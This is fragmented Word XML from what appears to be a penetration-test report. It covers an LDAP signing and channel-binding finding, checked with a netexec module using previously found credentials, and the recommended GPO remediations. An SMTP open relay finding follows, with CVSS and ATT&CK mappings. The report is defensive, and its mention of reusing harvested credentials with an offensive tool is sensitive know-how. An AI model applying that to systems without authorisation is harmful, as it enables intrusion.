          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> module from </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51D10DB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netexec</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51D10DB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check LDAP and Channel Binding settings, given </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="497AA1D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">valid </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="56441133">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="497AA1D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials discovered previously.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0EC75660" w14:textId="4A7EFD58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="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43A0DAAC" w:rsidP="0D325B6E" w:rsidRDefault="43A0DAAC" w14:paraId="27E3A85E" w14:textId="6FA52B4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3A0DAAC" w:rsidP="0D325B6E" w:rsidRDefault="43A0DAAC" w14:paraId="724EE998" w14:textId="7745A056">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3A0DAA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7A9E49C" w:rsidP="0D325B6E" w:rsidRDefault="17A9E49C" w14:paraId="606FE88E" w14:textId="7CCCBD4B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>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7A9E49C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable LDAP server </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7851FA45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signing by</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7851FA45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting the Domain Controller LDAP server signing requirements policy to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7851FA45">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Require signing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="17A9E49C" w:rsidP="0D325B6E" w:rsidRDefault="17A9E49C" w14:paraId="6CA7EC5C" w14:textId="3DAF8838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>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7A9E49C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable LDAP Channel Binding Tokens in Group Policy </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="390B64D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(GPO) on the Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="738644A7" w14:textId="36B06A3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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43A0DAAC" w:rsidP="0D325B6E" w:rsidRDefault="43A0DAAC" w14:paraId="4C421BFE" w14:textId="6AE9306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3A0DAAC">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34992A17" w:rsidP="0D325B6E" w:rsidRDefault="34992A17" w14:paraId="478CE003" w14:textId="7565B423">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rc385151269f242ca">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="34992A17">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Microsoft - LDAP Channel Binding and LDAP Signing Requirements</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34992A17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34992A17" w:rsidP="0D325B6E" w:rsidRDefault="34992A17" w14:paraId="07B3376A" w14:textId="5CF48A8A">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R4a37549eb1be4fee">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="34992A17">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Microsoft - How to Enable LDAP Signing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34992A17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1B1CB402" w14:textId="153425C6">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="75CEC431" w14:textId="672004E1">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4748EEDC" w14:textId="4147C6E8">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="53244EE7" w14:textId="55C9BFB7">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3DC8ED75" w14:textId="0A23FBC9">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="52B8C738" w14:textId="449DA7CC">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="01802686" w14:textId="73B5D6D5">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="16D872C1" w14:textId="4338A621">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="000B700A" w14:textId="71204047">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3CF6DA44" w14:textId="65360F53">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="686FDC40" w14:textId="4A94FEDF">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="687EE105" w14:textId="6E23C40B">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="08B27D43" w14:textId="74A0C3EE">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="633DC6E2" w14:textId="77B722D4">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0BF20E71" w14:textId="653A5CC9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2CAB3085" w14:textId="74B34A88">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FF11029" w:rsidP="0D325B6E" w:rsidRDefault="2FF11029" w14:paraId="01617B59" w14:textId="0A55E08A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2FF11029">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2FF11029">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1: SMTP Open Relay</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48D02923">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40D32B" w14:textId="58EB32C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F1C7CC" w14:textId="5D9C11D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EA35B8" w14:textId="2859A01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3633FB1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01D152" w14:textId="6A6C45F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0F04307" w14:textId="37C515E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EDF61F8" w14:textId="1F5E4583">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5.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="10860091">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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7355E8D" w14:textId="0CE68D23">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5F7D6AC9">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708FC77" w14:textId="4335C98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90B630A" w14:textId="194C4C23">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DB810DE"/>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DA03D27"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="20AECABB">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E76FF05" w14:textId="4602F9F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DC4866D" w:rsidP="0D325B6E" w:rsidRDefault="1DC4866D" w14:paraId="1A83D595" w14:textId="44C48E44">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N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" r:id="Rc93e562267cf4a8a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1DC4866D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="1DC4866D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4032709A">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D96578" w14:textId="4A9984F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4779C3B" w14:textId="43F6FCFE">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="0D325B6E">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C1725FE" w:rsidP="0D325B6E" w:rsidRDefault="3C1725FE" w14:paraId="3B554707" w14:textId="2EACECFA">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Ree0b6784813d40f3">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3C1725FE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1534: Internal Spearphishing</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="3C1725FE" w:rsidP="0D325B6E" w:rsidRDefault="3C1725FE" w14:paraId="28243A6E" w14:textId="4102776E">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8bda3772a7d64ee7">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3C1725FE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1598: Phishing for Information</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="3C1725FE">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5DA1678C">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56258B7"/>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C9B053" w14:textId="58143664">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="0D325B6E">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AEAD1A4" w:rsidP="0D325B6E" w:rsidRDefault="5AEAD1A4" w14:paraId="6F486BD3" w14:textId="2CDB2DEA">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re8b6c393e7354c98">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5AEAD1A4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1054: Software Configuration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="5AEAD1A4" w:rsidP="0D325B6E" w:rsidRDefault="5AEAD1A4" w14:paraId="14BAADFB" w14:textId="1231D850">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rc63e2fd4885042b3">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5AEAD1A4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M0801: Access Management</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="5AEAD1A4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
